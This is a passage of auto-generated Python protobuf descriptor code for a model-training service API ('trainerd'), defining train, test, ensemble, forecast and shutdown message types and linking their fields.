serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='featuresImportance', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.featuresImportance', index=13,
number=14, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_TESTRESPONSE_PIPFREEZEENTRY, _TESTRESPONSE_FEATURESIMPORTANCEENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3544,
serialized_end=4404,
)
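# TestResponse mirrors TrainResponse's environment capture (pythonVersionInfo,
# pipFreeze, featuresImportance) but splits its metrics into three repeated
# Measurement lists (train_result, test_result, benchmark_result) and carries
# cloud URIs for both the model artifacts and a second, "pre"-prefixed
# artifact set.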
_TRAINENSEMBLEREQUEST_SECRETENTRY = _descriptor.Descriptor(
name='SecretEntry',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.SecretEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.SecretEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.SecretEntry.value', index=1,
number=2, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1230,
serialized_end=1275,
)
_TRAINENSEMBLEREQUEST = _descriptor.Descriptor(
name='TrainEnsembleRequest',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='product', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.product', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='version', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.version', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bucket', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.bucket', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='base', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.base', index=3,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='model', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.model', index=4,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='study', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.study', index=5,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='datasource', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.datasource', index=6,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dataset', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.dataset', index=7,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='connection', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.connection', index=8,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='secret', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.secret', index=9,
number=11, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_TRAINENSEMBLEREQUEST_SECRETENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4407,
serialized_end=5331,
)
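# TrainEnsembleRequest extends the single-model request layout with a repeated
# 'base' field at number 5 (typed as training.v1alpha1.Model, presumably the
# constituent models of the ensemble), which shifts the field numbers of the
# trailing fields up by one relative to TrainRequest.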
_TESTENSEMBLEREQUEST_SECRETENTRY = _descriptor.Descriptor(
name='SecretEntry',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.SecretEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.SecretEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.SecretEntry.value', index=1,
number=2, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1230,
serialized_end=1275,
)
_TESTENSEMBLEREQUEST = _descriptor.Descriptor(
name='TestEnsembleRequest',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='product', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.product', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='version', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.version', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bucket', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.bucket', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='base', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.base', index=3,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='model', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.model', index=4,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='study', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.study', index=5,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='datasource', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.datasource', index=6,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dataset', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.dataset', index=7,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='connection', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.connection', index=8,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='secret', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.secret', index=9,
number=11, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_TESTENSEMBLEREQUEST_SECRETENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5334,
serialized_end=6256,
)
_FORECASTREQUEST_SECRETENTRY = _descriptor.Descriptor(
name='SecretEntry',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.SecretEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.SecretEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.SecretEntry.value', index=1,
number=2, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1230,
serialized_end=1275,
)
_FORECASTREQUEST = _descriptor.Descriptor(
name='ForecastRequest',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='product', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.product', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='version', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.version', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bucket', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.bucket', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='model', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.model', index=3,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='study', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.study', index=4,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='datasource', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.datasource', index=5,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dataset', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.dataset', index=6,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='connection', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.connection', index=7,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='secret', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.secret', index=8,
number=10, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_FORECASTREQUEST_SECRETENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6259,
serialized_end=7094,
)
_FORECASTRESPONSE = _descriptor.Descriptor(
name='ForecastResponse',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='forecastCloudUri', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ForecastResponse.forecastCloudUri', index=0,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7096,
serialized_end=7140,
)
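# ShutdownRequest/ShutdownResponse below carry no fields; presumably they exist
# only to give the shutdown RPC a typed request/response pair.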
_SHUTDOWNREQUEST = _descriptor.Descriptor(
name='ShutdownRequest',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ShutdownRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7142,
serialized_end=7159,
)
_SHUTDOWNRESPONSE = _descriptor.Descriptor(
name='ShutdownResponse',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.ShutdownResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7161,
serialized_end=7179,
)
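# Post-definition wiring: the assignments below resolve message-typed fields
# against descriptors imported from the generated data/infra/training/catalog
# v1alpha1 modules, attach each synthesized map entry to its containing
# message, and finally register the file descriptor with the default symbol
# database.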
_TRAINREQUEST_SECRETENTRY.containing_type = _TRAINREQUEST
_TRAINREQUEST.fields_by_name['product'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCT
_TRAINREQUEST.fields_by_name['version'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCTVERSION
_TRAINREQUEST.fields_by_name['bucket'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._VIRTUALBUCKET
_TRAINREQUEST.fields_by_name['model'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODEL
_TRAINREQUEST.fields_by_name['study'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._STUDY
_TRAINREQUEST.fields_by_name['datasource'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASOURCE
_TRAINREQUEST.fields_by_name['dataset'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASET
_TRAINREQUEST.fields_by_name['connection'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._CONNECTION
_TRAINREQUEST.fields_by_name['secret'].message_type = _TRAINREQUEST_SECRETENTRY
_TRAINRESPONSE_PIPFREEZEENTRY.containing_type = _TRAINRESPONSE
_TRAINRESPONSE_FEATURESIMPORTANCEENTRY.containing_type = _TRAINRESPONSE
_TRAINRESPONSE.fields_by_name['result'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_catalog_dot_v1alpha1_dot_generated__pb2._MEASUREMENT
_TRAINRESPONSE.fields_by_name['pipFreeze'].message_type = _TRAINRESPONSE_PIPFREEZEENTRY
_TRAINRESPONSE.fields_by_name['featuresImportance'].message_type = _TRAINRESPONSE_FEATURESIMPORTANCEENTRY
_COMPILEREQUEST_SECRETENTRY.containing_type = _COMPILEREQUEST
_COMPILEREQUEST.fields_by_name['product'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCT
_COMPILEREQUEST.fields_by_name['version'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCTVERSION
_COMPILEREQUEST.fields_by_name['bucket'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._VIRTUALBUCKET
_COMPILEREQUEST.fields_by_name['model'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODEL
_COMPILEREQUEST.fields_by_name['study'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._STUDY
_COMPILEREQUEST.fields_by_name['datasource'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASOURCE
_COMPILEREQUEST.fields_by_name['dataset'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASET
_COMPILEREQUEST.fields_by_name['connection'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._CONNECTION
_COMPILEREQUEST.fields_by_name['secret'].message_type = _COMPILEREQUEST_SECRETENTRY
_TESTREQUEST_SECRETENTRY.containing_type = _TESTREQUEST
_TESTREQUEST.fields_by_name['product'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCT
_TESTREQUEST.fields_by_name['version'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCTVERSION
_TESTREQUEST.fields_by_name['bucket'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._VIRTUALBUCKET
_TESTREQUEST.fields_by_name['model'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODEL
_TESTREQUEST.fields_by_name['study'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._STUDY
_TESTREQUEST.fields_by_name['datasource'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASOURCE
_TESTREQUEST.fields_by_name['dataset'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASET
_TESTREQUEST.fields_by_name['connection'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._CONNECTION
_TESTREQUEST.fields_by_name['secret'].message_type = _TESTREQUEST_SECRETENTRY
_TESTRESPONSE_PIPFREEZEENTRY.containing_type = _TESTRESPONSE
_TESTRESPONSE_FEATURESIMPORTANCEENTRY.containing_type = _TESTRESPONSE
_TESTRESPONSE.fields_by_name['train_result'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_catalog_dot_v1alpha1_dot_generated__pb2._MEASUREMENT
_TESTRESPONSE.fields_by_name['test_result'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_catalog_dot_v1alpha1_dot_generated__pb2._MEASUREMENT
_TESTRESPONSE.fields_by_name['benchmark_result'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_catalog_dot_v1alpha1_dot_generated__pb2._MEASUREMENT
_TESTRESPONSE.fields_by_name['pipFreeze'].message_type = _TESTRESPONSE_PIPFREEZEENTRY
_TESTRESPONSE.fields_by_name['featuresImportance'].message_type = _TESTRESPONSE_FEATURESIMPORTANCEENTRY
_TRAINENSEMBLEREQUEST_SECRETENTRY.containing_type = _TRAINENSEMBLEREQUEST
_TRAINENSEMBLEREQUEST.fields_by_name['product'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCT
_TRAINENSEMBLEREQUEST.fields_by_name['version'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCTVERSION
_TRAINENSEMBLEREQUEST.fields_by_name['bucket'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._VIRTUALBUCKET
_TRAINENSEMBLEREQUEST.fields_by_name['base'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODEL
_TRAINENSEMBLEREQUEST.fields_by_name['model'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODEL
_TRAINENSEMBLEREQUEST.fields_by_name['study'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._STUDY
_TRAINENSEMBLEREQUEST.fields_by_name['datasource'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASOURCE
_TRAINENSEMBLEREQUEST.fields_by_name['dataset'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASET
_TRAINENSEMBLEREQUEST.fields_by_name['connection'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._CONNECTION
_TRAINENSEMBLEREQUEST.fields_by_name['secret'].message_type = _TRAINENSEMBLEREQUEST_SECRETENTRY
_TESTENSEMBLEREQUEST_SECRETENTRY.containing_type = _TESTENSEMBLEREQUEST
_TESTENSEMBLEREQUEST.fields_by_name['product'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCT
_TESTENSEMBLEREQUEST.fields_by_name['version'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCTVERSION
_TESTENSEMBLEREQUEST.fields_by_name['bucket'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._VIRTUALBUCKET
_TESTENSEMBLEREQUEST.fields_by_name['base'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODEL
_TESTENSEMBLEREQUEST.fields_by_name['model'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODEL
_TESTENSEMBLEREQUEST.fields_by_name['study'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._STUDY
_TESTENSEMBLEREQUEST.fields_by_name['datasource'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASOURCE
_TESTENSEMBLEREQUEST.fields_by_name['dataset'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASET
_TESTENSEMBLEREQUEST.fields_by_name['connection'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._CONNECTION
_TESTENSEMBLEREQUEST.fields_by_name['secret'].message_type = _TESTENSEMBLEREQUEST_SECRETENTRY
_FORECASTREQUEST_SECRETENTRY.containing_type = _FORECASTREQUEST
_FORECASTREQUEST.fields_by_name['product'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATAPRODUCT
